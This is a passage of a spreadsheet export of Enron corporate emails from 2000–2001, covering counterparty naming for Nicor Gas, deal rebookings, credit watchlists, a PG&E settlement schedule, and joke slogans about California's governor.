Bryan/HOU/ECT@ECT, Bridgette Anderson/Corp/Enron@ENRON, Susan _x000D_
Bailey/HOU/ECT@ECT _x000D_
Subject: Re: Northern Illinois Gas Company/Nicor Gas Company  _x000D_
_x000D_
Per my conversation with Nicor Gas Company's attorney, Northern Illinois Gas _x000D_
Company changed its name to Nicor Gas Company. Therefore, Nicor Gas Company _x000D_
is the only entity that all the deals needs to be booked under. However, the _x000D_
attorney also agreed to the fact that they do use the name "Northern Illinois _x000D_
Gas Company d/b/a Nicor Gas Company" eversince the name change happened. He _x000D_
said they had been using both names "contractually" and interchangeably even _x000D_
though it is all just ONE company, one state registered company._x000D_
_x000D_
I'm currently waiting on name change documents, however this is what it looks _x000D_
like thats going to happen:_x000D_
The main HQ company would end up being NICOR GAS COMPANY with all the _x000D_
trades/contracts/deals being merged into one record. However, if need be we _x000D_
could have a Tradename set up as "Northern Illinois Gas Company d/b/a Nicor _x000D_
Gas Company" since this is how the company does business as, in some cases._x000D_
_x000D_
Nicor's legal Dept could be reached at (630) 983-8676 for any further _x000D_
clarifications in this matter._x000D_
_x000D_
Adnan Patel_x000D_
Global Counterparty_x000D_
x58335_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 08/17/2000 03:47 PM_x000D_
To: Stacy E Dickson/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT_x000D_
cc: Frank L Davis/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Adnan _x000D_
Patel/Corp/Enron@ENRON _x000D_
Subject: Northern Illinois Gas Company/Nicor Gas Company_x000D_
_x000D_
There appears to be confusion over who and what products we should be trading _x000D_
with these entities._x000D_
_x000D_
We have an ISDA Master Agreement in place with Northern Illinois Gas Company _x000D_
d/b/a Nicor Gas Company.  This is a new master.  If the counterparty is not _x000D_
set up this way it need to be._x000D_
_x000D_
Physical gas has a master in place with Northern Illinois Gas Company._x000D_
_x000D_
There is no master agreement in place with Nicor Gas Company and the only _x000D_
trading being done with this entity is online gas trading._x000D_
_x000D_
The issue that needs to be resolved is whether we want to trade gas under _x000D_
both Northern Illinois Gas Company and Nicor Gas Company.  Frank Davis will _x000D_
resolve this issue with Tom Moran in Credit and Stacy Dickson with physical _x000D_
gas Legal, and they will let us know who we should be trading with._x000D_
_x000D_
When we hear back from them we can finally resolve what counterparty names we _x000D_
want to set up and get back to the counterparty if we have not received the _x000D_
correct Password Application to match out intended trading partners._x000D_
_x000D_
Sorry for all the confusion this is causing.  I am confused too._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 10:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Rosalee Fleming/Corp/Enron on 12/13/2000 _x000D_
05:54 PM ---------------------------_x000D_
_x000D_
Kathy Mayfield_x000D_
12/13/2000 05:07 PM_x000D_
_x000D_
_x000D_
To: Rosalee Fleming/Corp/Enron@ENRON_x000D_
cc: Elyse Kalmans/Corp/Enron@ENRON _x000D_
Subject: Thank you for the Charitygift_x000D_
_x000D_
I'm not sure how this message got in the format below, but reading between _x000D_
the lines, it reads:_x000D_
_x000D_
Jeff Skilling,_x000D_
 What a great idea!!  Thanks for including me. _x000D_
 See you soon.  Bill_x000D_
_x000D_
---------------------- Forwarded by Kathy Mayfield/Corp/Enron on 12/13/2000 _x000D_
04:39 PM ---------------------------_x000D_
_x000D_
_x000D_
wvlarkin@travisintl.com on 12/13/2000 04:35:51 PM_x000D_
To: kathy.mayfield@enron.com, Jeff@ns1.charitygift.com, _x000D_
Skilling@ns1.charitygift.com, What@ns1.charitygift.com, _x000D_
a@ns1.charitygift.com, great@ns1.charitygift.com, idea!!@ns1.charitygift.com, _x000D_
Thanks@ns1.charitygift.com, for@ns1.charitygift.com, _x000D_
including@ns1.charitygift.com, me.@ns1.charitygift.com, _x000D_
See@ns1.charitygift.com, you@ns1.charitygift.com, soon.@ns1.charitygift.com, _x000D_
Bill@ns1.charitygift.com_x000D_
cc:  _x000D_
_x000D_
Subject: Thank you for the Charitygift_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({"martin.o'leary@enron.com", 'bob.shults@enron.com', 'lucy.ortiz@enron.com', 'kate.symes@enron.com', 'nidia.mendoza@enron.com', 'charles.decker@enron.com', 'janice.moore@enron.com', 'christian.yoder@enron.com', 'darren.vanek@enron.com', 'mark.fischer@enron.com', 'rhonda.denton@enron.com', 'adriane.moratto@enron.com', 'genia.fitzgerald@enron.com', 'william.bradford@enron.com', 'wendy.conwell@enron.com', 'james.copeland@enron.com', 'david.vitrella@enron.com', 'tanya.rohauer@enron.com', 'andrea.hauser@enron.com', 'mary.gosnell@enron.com', 'justin.rostant@enron.com', 'homer.lin@enron.com', 'bryan.hull@enron.com', 'kim.theriot@enron.com', 'connie.sutton@enron.com', 'dan.mccairns@enron.com', 'wendi.lebrocq@enron.com', 'molly.harris@enron.com', 'russell.diamond@enron.com', 'tyesha_woods@pgn.com', 'jason.williams@enron.com', 'brant.reves@enron.com', 'bob.schorr@enron.com', 'janet.moore@enron.com', 'elizabeth.sager@enron.com', 'brad.horn@enron.com', 'tom.moran@enron.com', 'derenda.plunkett@enron.com', 'jeff.richter@enron.com', 'edward.sacks@enron.com', 'daniel.diamond@enron.com', 'harry.bucalo@enron.com', 'ted.murphy@enron.com', 'gregory.schockling@enron.com', 'walter.guidroz@enron.com', 'bradley.diebner@enron.com', 'shari.stack@enron.com', 'teresa.seibel@enron.com', 'george.hope@enron.com', 'lesli.campbell@enron.com', 'andrew.greer@enron.com', 'carla.hoffman@enron.com', 'debbie.brackett@enron.com', 'veronica.gonzalez@enron.com', 'john.zurita@enron.com', 'robert.shiring@enron.com', 'monica.lande@enron.com', 'suneet.sharma@enron.com', 'veronica.espinoza@enron.com', 'beth.cowan@enron.com', 'ragan.vaughan@bhld.com', 'valarie.sabo@enron.com', 'jubran.whalan@enron.com', 'david.portz@enron.com', 'rudwell.johnson@enron.com', 'paul.radous@enron.com', 'jane.wilhite@enron.com', 'lisa.gillette@enron.com', 'tamara.black@enron.com', 'richard.ring@enron.com', 'teresa.mandola@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Revised Credit Watchlist</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find an updated EPMI Power Credit Watch List as of 12/13/00.  _x000D_
Please direct any questions and/or comments to the Credit Hotline _x000D_
(713-853-1803)._x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 20:36:28 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/2/02; HourAhead hour: 19;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/2/02; HourAhead hour: 19;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010219.txt</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 06:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> This is a test.</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 08:08:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>Birthday Lunch w/ Julie &amp; Tracy Geaccone</t>
  </si>
  <si>
    <t>10/24 Reservations secured for 11:30 713-227-9141_x000D_
on Main between Rusk and Capitol</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 08:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>11-7-00 Checkout</t>
  </si>
  <si>
    <t>Sean Crandall_x000D_
deal: 453094_x000D_
error:  Sean with Amerex does not recognize_x000D_
_x000D_
Diana Scholtes_x000D_
deal: 452697_x000D_
error: Prebon shows price as $93........enpower has $95_x000D_
_x000D_
_x000D_
Mark fischer_x000D_
deal: 453278_x000D_
error:  Prebon shows terms as Dec'00 ......enpower shows 11/9</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 09:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.radous@enron.com', 'lesli.campbell@enron.com'})</t>
  </si>
  <si>
    <t>Re: Deal # q15463</t>
  </si>
  <si>
    <t xml:space="preserve">Deal #Q15463 has been rebooked in TAGG.  Let me know if either of you need _x000D_
anything else._x000D_
_x000D_
Thanks,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
To: susan.scott@enron.com_x000D_
cc:  _x000D_
Subject: Re: Deal # q15463_x000D_
_x000D_
Susan,_x000D_
 _x000D_
 Please rebook this new CP._x000D_
_x000D_
Thanks_x000D_
_x000D_
Lesli_x000D_
---------------------- Forwarded by Lesli Campbell/HOU/ECT on 10/03/2000 _x000D_
04:04 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Paul Radous @ ENRON                                                    _x000D_
         10/02/2000 05:53 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Lesli Campbell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Deal # q15463  _x000D_
_x000D_
General de Ceramica, S.A. de C.V._x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  Lesli Campbell @ ECT                                                   _x000D_
          10/02/2000 05:28 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Paul Radous/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Deal # q15463_x000D_
_x000D_
Paul,_x000D_
 _x000D_
 This new CP was pending you.  Any ideas who it is?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Lesli_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 05:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">You are such a renewable energy stud! I'm excited to see you and Elliot _x000D_
transform the way the world thinks of POWER._x000D_
_x000D_
K_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 04/05/2001 12:51 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Elliot Mainzer                           04/05/2001 12:37 PM_x000D_
	_x000D_
_x000D_
To: Portland West Desk_x000D_
cc:  _x000D_
_x000D_
Subject: Renewable Power Desk_x000D_
_x000D_
I am pleased to announce that Jesse Bryson will be joining me as a Research _x000D_
Analyst on the Renewable Power Desk effective April 16._x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 08:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rnagatani@venocoinc.com', 'andy.bettwy@swgas.com', 'sedgar@socalgas.com', 'gworster@txuenergy.com', 'rczahar@aol.com', 'tpeterso@energy.state.ca.us', 'paulamirault@aec.ca', 'rliebert@cfbf.com', 'rroth@sempra-slns.com', 'rshively@enerdynamics.com', 'frazier@bull.som.yale.edu', 'phanschen@mofo.com', 'eklinkner@ci.pasadena.ca.us', 'lbdr@powercomenergy.com', 'jvaccaro@sdge.com', 'susan.scott@enron.com', 'dwillis@sdge.com', 'mcclintocke@epenergy.com', 'napedersen@jonesday.com', 'tsolberg@spurr.org', 'dave.sloan@gt.pge.com', 'jmartini@cipa.org', 'abb@eslawfirm.com', 'porterdk@sce.com', 'roger_tisdale@oxy.com', 'thompson@wrightlaw.com', 'cdoering@reconcorp.com', 'steve_ponder@fpl.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'sslavigne@duke-energy.com', 'michael-briggs@reliantenergy.com', 'gnstillwagon@tid.org', 'mmce@dynegy.com', 'prescorw@bp.com', 'sneiman483@aol.com', 'mtbrommer@tid.org', 'gnadeau@suncor.com', 'wng@fpl.com', 'regaffairs@sf.whitecase.com', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'bradb@calpine.com', 'peter.saunders@paramountres.com', 'rbetonte@socalgas.com', 'jlinam@socalgas.com', 'mrokose@energyamerica.com', 'scarter@nrdc.org', 'oro@cpuc.ca.gov', 'cmkehrein@ems-ca.com', 'mcconnk@epenergy.com', 'aamirali@caiso.com', 'pmoritzburke@cera.com', 'steve.huhman@southernenergy.com', 'alex.sugaoka@uaecorp.com', 'bcope@ci.redding.ca.us', 'michael_r._soland@oxy.com', 'jbennett@gmssr.com', 'bpedersen@igservice.com', 'mar.toe@att.net', 'jsuwara@sempra.com', 'keith-sappenfield@reliantenergy.com', 'phildavies@aec.ca', 'dlevine@caiso.com', 'jmackay@unitedgas.com', 'nge@value.net', 'bmcc@mccarthylaw.com', 'john_ulrich@city.palo-alto.ca.us', 'slins@ci.glendale.ca.us', 'ceyap@earthlink.net', 'edwardoniell@dwt.com', 'rochmanm@spurr.org', 'jweil@aglet.org', 'alan_reid@pancanadian.ca', 'simonsen@rmi.net', 'bburns@caiso.com', 'hgleason@energyamerica.com', 'mtran@energy.state.ca.us', 'ascott@sdge.com', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'hankd@calpine.com', 'jerryl@abag.ca.gov', 'mike.huk@gov.ab.ca', 'gregs@mid.org', 'cushnice@sce.com', 'jaime.ramirez@swgas.com', 'jpjordan@swidlaw.com', 'gwright@sempra.com', 'mmbr@dynegy.com', 'pete.frost@usa.conoco.com', 'gtbl@dynegy.com', 'bgaillar@enron.com', 'bbrunel@smud.org', 'ecrem@ix.netcom.com', 'jurewijl@sce.com', 'mjaske@energy.state.ca.us', 'mbornhoeft@socalgas.com', 'pstohr@dbsr.com', 'tmiller@ucmohio.com', 'kfyip@seiworldwide.com', 'spb1@cwclaw.com', 'rhc@mrwassoc.com', 'jtachera@energy.state.ca.us', 'paul.macavoy@yale.edu', 'pat_mulhern@oxy.com', 'benledene@aec.ca', 'jamesauld@aec.ca', 'rjl9@pge.com', 'gregory_hood@oxy.com', 'atrowbridge@dbsr.com', 'katie_elder@rmiinc.com', 'gjb2@pge.com', 'office@mccarthylaw.com', 'jsteffen@iid.com', 'douglass@arterhadden.com', 'jmct@gmssr.com', 'bmantz@sempra-slns.com', 'bobfraser@aec.ca', 'kmagruder@newpower.com', 'kbhensman@aeraenergy.com', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'richard.jordan@swgas.com', 'scohn@smud.org', 'erin_m_delsing@reliantenergy.com', 'gpickering@idahopower.com', 'khensman@aeraenergy.com', 'judypau@dwt.com', 'healyb@epenergy.com', 'sross@state.nm.us', 'jharrigan@socalgas.com', 'alfredo.huertas@enron.com', 'mark.c.moench@wgp.twc.com', 'pinney@capp.ca', 'csullivan@coral-energy.com', 'jgopal@energy.state.ca.us', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'cyowell@ziagroup.com', 'bcragg@gmssr.com', 'mpa@aelaw.com', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'dalbers@avistacorp.com', 'grant_kolling@city.palo-alto.ca.us', 'jnm@cpuc.ca.gov', 'bfolsom@avistacorp.com', 'zaiontj@bp.com', 'ron_oechsler@rmiinc.com', 'furutanj@efawest.navfac.navy.mil', 'kmccrea@sablaw.com', 'rishikawa@socalgas.com', 'rpelote@energy.twc.com', 'jfossum@westernhubs.com', 'chawes@txuenergy.com', 'plg@cpuc.ca.gov', 'fergusonm@epenergy.com', 'rmp@cpuc.ca.gov', 'eric.eisenman@neg.pge.com', 'llorenz@pacent.com', 'mdjoseph@adamsbroadwell.com', 'tod_bradley@powerspring.com', 'thamilto@enron.com', 'randy_richards@powerspring.com', 'bradylaw@pacbell.net', 'chilen@llgm.com', 'joseh@lif.org', 'kpoole@adamsbroadwell.com', 'toca@utility-savings.com', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'egw@aelaw.com', 'lmh@eslawfirm.com', 'rcampbell@wwdb.org', 'tomb@crossborderenergy.com', 'jdasovic@enron.com', 'jcattermole@pcenergy.com', 'kirk.t.morgan@wgp.twc.com', 'rgloistein@orrick.com', 'ljhubbard@sempra.com', 'tgary@pcenergy.com', 'keith.brown@swgas.com', 'mnyberg@energy.state.ca.us', 'ddame@ncpa.com', 'iep@iepa.com', 'kschellin@mtpower.com', 'difellman@earthlink.net', 'mday@gmssr.com', 'cottlli@sf.whitecase.com', 'mcollette@econone.com', 'pkeeler@br-inc.com', 'dft1@pge.com', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'david.bayless@utility.com', 'chris.king@utility.com', 'tsurak@socalgas.com', 'robertg@greenlining.org', 'rcooper@usg.com', 'cprice@igservice.com', 'ghinners@reliantenergy.com', 'stringham@capp.ca', 'haorndorff@aeraenergy.com', 'stomashe@energy.state.ca.us', 'rdw0@pge.com', 'dwswapp@duke-energy.com', 'raveen_maan@city.palo-alto.ca.us', 'lynn.g.dahlberg@wgp.twc.com', 'rfoss@coral-energy.com', 'karl@ncpa.com', 'marcel@turn.org', 'epoole@adplaw.com', 'jsqueri@gmssr.com', 'tdickers@westerngas.com', 'worthycg@bp.com', 'bdahncke@pcenergy.com', 'rcrowley@coral-energy.com', 'clower@earthlink.net', 'justin_sutton@powerspring.com', 'inggm@sce.com', 'fillmotw@sce.com', 'igsinc@ix.netcom.com', 'mpocino@rcgroup.com', 'oshirock@pacbell.net', 'pcervin@br-inc.com', 'chj@aelaw.com', 'michael.alexander@sce.com', 'ewo@jmbm.com', 'rmccann@cal.net', 'bruce.a.connell@usa.conoco.com', 'kpurbhoo@enron.com', 'pjpowerlaw@aol.com', 'jond@qstr.com', 'khatz@titanenergy.com', 'dmkellerton@ibm.net', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dpk@cipa.org', 'jyoung@igservice.com', 'ronknecht@aol.com', 'mbaldwin@igservice.com', 'craigc@calpine.com', 'txb6@pge.com', 'ed@clfp.com', 'agoldberg@lgl.twc.com', 'charles.jacobini@acnenergy.com', 'girish_balachandran@city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'rpurves@sdge.com', 'kxl@mrwassoc.com', 'brad.king@usa.conoco.com', 'frl3@pge.com', 'smcfadden@igservice.com', 'cabaker@duke-energy.com', 'tlewis@titanenergy.com', 'redavis@sempra.com', 'candjenterprises@home.com', 'rtask@reliantenergy.com', 'sandra_mcdonough@pcp.ca', 'skatz@sempratrading.com', 'swatson@socalgas.com', 'fogelmanm@steefel.com', 'cgoodman@energymarketers.com', 'gsullivan@sempra.com', 'btheaker@caiso.com', 'jfawcet@enron.com', 'mflorio@turn.org', 'kmills@cfbf.com', 'vhconsult@earthlink.net'})</t>
  </si>
  <si>
    <t>PG&amp;E Gas Accord II: Next Steps</t>
  </si>
  <si>
    <t xml:space="preserve">  CONFIDENTIAL SETTLEMENT MATERIAL_x000D_
  PER CPUC RULE 51_x000D_
_x000D_
TO ALL PARTIES:_x000D_
_x000D_
We appreciate the wide and active participation in the "Gas Accord II"_x000D_
Workshops to date, and we particularly thank the parties who have taken the_x000D_
time to identify issues and proposals of concern to them.  The PG&amp;E team is_x000D_
working hard to put all of this into the context of an initial Gas Accord II_x000D_
Settlement Proposal.  However, we have concluded that, in order to do the_x000D_
job properly, we need to delay our target date for circulating a proposal,_x000D_
until Wednesday, December 20, 2000._x000D_
_x000D_
Because of this delay in circulating a proposal, we also are canceling the_x000D_
proposed all-party meeting scheduled for December 13th and 14th._x000D_
_x000D_
Accordingly, the next all-party meeting is the one that we had previously_x000D_
scheduled to occur on January 10 and 11, 2001.  We will use that meeting to_x000D_
discuss and explain the PG&amp;E proposal, and to receive feedback from the_x000D_
parties._x000D_
_x000D_
Attached below is the meeting schedule for next year that we outlined_x000D_
earlier in the process.  We encourage everyone to keep these meeting dates_x000D_
on your calendars.  We will fill in more details on the specific agendas as_x000D_
we move forward._x000D_
_x000D_
Again, thank you for your participation in the Gas Accord II Settlement_x000D_
Process.  We look forward to providing you with our initial proposal, and to_x000D_
our subsequent settlement discussions._x000D_
_x000D_
Please feel free to call or e-mail us if you have questions or concerns._x000D_
_x000D_
Frank Lindh    Ray Williams_x000D_
415-973-2776    415-973-3634_x000D_
frl3@pge.com    rdw0@pge.com_x000D_
_x000D_
 &lt;&lt;Gas Accord II Settlement Schedule.doc&gt;&gt;_x000D_
_x000D_
 - Gas Accord II Settlement Schedule.doc</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 05:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: AVAILABILITY for call today</t>
  </si>
  <si>
    <t>Yes.</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 10:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janie.aguayo@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Deal QQ9854 does not become a NX3 swap until after Dec. 21, 2001, if it _x000D_
assigned.  Before then it has to be booked as a swaption expiring on Dec 21, _x000D_
2001._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Errol_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janie Aguayo@ECT_x000D_
02/09/2001 05:14 PM_x000D_
To: Errol McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Rebook_x000D_
_x000D_
Hi Errol,_x000D_
_x000D_
Would you please change the index on QQ9854.1 &amp; .2 to NX3._x000D_
_x000D_
Thank you - Janie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 01:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ken Lay spoke with several California CEOs this morning and urged them to get _x000D_
personally involved in pushing for a comprehensive set of reforms.  Three _x000D_
expressed willingness to help._x000D_
_x000D_
Scott McNealy (Sun):  contact person - Piper Cole (piper.cole@sun.com); _x000D_
scott.mcnealy@engeng.sun.com.  Mcnealy wants, by close of business today, a _x000D_
"cheat sheet" of the talking points to use with politicians (the "8 or 10 _x000D_
elements of the solution") with the expected comeback he may hear from the _x000D_
political leaders and our response to that comeback.  He says he hasn't spent _x000D_
time working on issues in Sacremento so we may also want to include a list of _x000D_
suggested contacts._x000D_
Kevin Sharer (Amgen): contact person - Sarah Jensen, VP of Engineering and _x000D_
Operations (805.447.6785); ksharer@amgen.com.  Sharer wants the same _x000D_
information as McNealy and he and McNealy both indicated their willingness to _x000D_
call a meeting of other California CEOs.  Sharer will also be having _x000D_
breakfast with Hertzberg one week from today._x000D_
Robert Day (Trust Co of the West):  said that he is very close to the mayor _x000D_
of Los Angeles.  He urged Ken to call the mayor (mentioning Day).  Ken would _x000D_
like some talking points for that call._x000D_
_x000D_
Jeff - please put these items together.</t>
  </si>
  <si>
    <t>Mon, 17 Apr 2000 01:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shari.wicks@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sburns@enron.com', 'michael.grimes@enron.com', 'terence.thorn@enron.com', 'john.ambler@enron.com'})</t>
  </si>
  <si>
    <t>Japan Working Group Conference Call</t>
  </si>
  <si>
    <t xml:space="preserve">Nick O'Day is proposing to hold the next Japan Working Group Conference Call _x000D_
on Tuesday 25 April at 9am (Houston time).  Nick will be visiting Houston _x000D_
over the period 24 April to 27 April and would like to hold the call during _x000D_
this period._x000D_
_x000D_
Please let me know if you will not be available for this call._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2000 23:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Tapes</t>
  </si>
  <si>
    <t>I need to pull my tapes for Jan 21st.  Would you take care of that please?</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Who ever is working on this please add this to the draft._x000D_
_x000D_
----- Forwarded by Brent Hendry/NA/Enron on 10/10/2000 05:23 PM -----_x000D_
_x000D_
	Paul Radous_x000D_
	10/10/2000 04:08 PM_x000D_
		 _x000D_
		 To: Brent Hendry/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Smith Barney AAA Energy Fund L.P._x000D_
_x000D_
Brent,_x000D_
_x000D_
We also want to require the maintenance of an up front cushion amount of _x000D_
$250,000 to open up trading.  That is not indicated on the worksheet._x000D_
---------------------- Forwarded by Paul Radous/Corp/Enron on 10/10/2000 _x000D_
04:07 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Paul Radous                                                            _x000D_
 10/10/2000 02:32 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Stephanie _x000D_
Panus/NA/Enron@Enron, Tana Jones/HOU/ECT@ECT_x000D_
cc: William S Bradford/HOU/ECT@ECT, Brent Hendry/NA/Enron@Enron _x000D_
_x000D_
Subject: Smith Barney AAA Energy Fund L.P._x000D_
_x000D_
Please prepare a draft isda for this hedge fund ASAP.  Before actually _x000D_
distributing this ISDA, please give me word that it is ready in the event _x000D_
that Bill wants to tweak something._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 08:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PCA Litigation</t>
  </si>
  <si>
    <t>Richard just told me that we settled PCA.  That's great news but I will miss _x000D_
the opportunity to work with you.  Thanks for all your help on this matter _x000D_
and I hope we get to work together again on some other matter in the near _x000D_
future.</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 01:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gfoster@antigenics.com'})</t>
  </si>
  <si>
    <t>frozenset({'smara@enron.com', 'rshapiro@enron.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>FW: Davis Slogans 2002</t>
  </si>
  <si>
    <t xml:space="preserve">thought you all would need a little cheer in your otherwise miserable_x000D_
professional existence._x000D_
_x000D_
-----Original Message-----_x000D_
From: Curt Pringle [mailto:Curt@curtpringle.com]_x000D_
Sent: Wednesday, May 30, 2001 10:44 PM_x000D_
Subject: FW: Davis Slogans 2002_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I am sure you have seen these.  But if not, enjoy!_x000D_
_x000D_
Curt_x000D_
_x000D_
----------------------------_x000D_
_x000D_
Choose your favorite, or create your own!_x000D_
_x000D_
R_x000D_
_x000D_
_x000D_
&gt; "Davis in 2002: Ich bin ein Bulb-dimmers."_x000D_
&gt; "Davis in 2002: Power to some of the people!"_x000D_
&gt; "Davis in 2002: The tunnel at the end of the blight!"_x000D_
&gt; "Davis in 2002: Gazpacho and candlelight dinners."_x000D_
&gt; "Davis -- Angela or Gray, it doesn't matter -- in 2002."_x000D_
&gt; "Davis in 2002: Carpe nocturna!"_x000D_
&gt; "Davis in 2002: What you see is what you get"_x000D_
&gt; "Davis in 2002: Iceberg? What iceberg?"_x000D_
&gt; "Davis in 2002: Back to basics -- rocks, sticks, flint."_x000D_
&gt; "Davis in 2002: A kite and a key for every house."_x000D_
&gt; "Davis in 2002: Made in the shade."_x000D_
&gt; "Davis in 2002: Think of it as camping."_x000D_
&gt; "Davis in 2002: 'Survivor' comes home."_x000D_
&gt; "Davis in 2002: A thousand points of light, give or take a thousand."_x000D_
&gt; "Davis in 2002: Second rate deserves a second chance."_x000D_
&gt; "Davis in 2002: Celebrate futility."_x000D_
&gt; "Davis in 2002: Batteries not included."_x000D_
&gt; "Davis in 2002: A windmill for every home."_x000D_
&gt; "Davis in 2002: Be all that you can't see."_x000D_
&gt; "Davis in 2002: An army of one."_x000D_
&gt; "Davis in 2002: An army of none."_x000D_
&gt; "Davis in 2002: I've not yet begun to blight."_x000D_
&gt; "Davis in 2002: Keep the good times rolling!"_x000D_
&gt; "Davis in 2002: Ask yourself: Are you better off today than you were_x000D_
438_x000D_
&gt; years ago?'"_x000D_
&gt; "Davis in 2002: Your bridge to the 18th century."_x000D_
&gt; "Davis in 2002: Come over to the Dark Side."_x000D_
&gt; "Davis in 2002: Now he'll solve the traffic problem."_x000D_
&gt; "Davis in 2002: It wasn't me."_x000D_
&gt; "Davis in 2002: You can't fall off the floor."_x000D_
&gt; "Davis in 2002: Nowhere to go but up."_x000D_
&gt; "Davis in 2002: Stick with the devil you know."_x000D_
&gt; "Davis in 2002: Make love, not power."_x000D_
&gt; "Davis in 2002: Embrace the night."_x000D_
&gt; "Davis in 2002: Moving forward at the speed of a 28K modem."_x000D_
&gt; "Davis in 2002: Dead man talking."_x000D_
&gt; "Davis in 2002: If the light ain't lit, you must acquit."_x000D_
&gt; "Davis in 2002: Bringing back day baseball."_x000D_
&gt; "Davis in 2002: Power? We don't need no stinking power."_x000D_
&gt; "Davis in 2002: Read my lips: No new power."_x000D_
&gt; "Davis in 2002: Reach for the curb."_x000D_
&gt; "Davis in 2002: Got power?"_x000D_
&gt; "Davis in 2002: 58,000,000 French can't be wrong."_x000D_
&gt; And, finally, "A vote for Davis is a vote for morbid curiosity."_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; </t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 07:42:02 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Melissa Videtto - Active employee</t>
  </si>
  <si>
    <t>WHEW!_x000D_
_x000D_
Thank you!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Monday, December 31, 2001 8:52 AM_x000D_
To:	Videtto, Melissa_x000D_
Subject:	FW: Melissa Videtto - Active employee_x000D_
_x000D_
FYI -looks like everything is fine.  sorry for the mix up._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Alvarez, Irma  _x000D_
Sent:	Wednesday, December 26, 2001 5:23 PM_x000D_
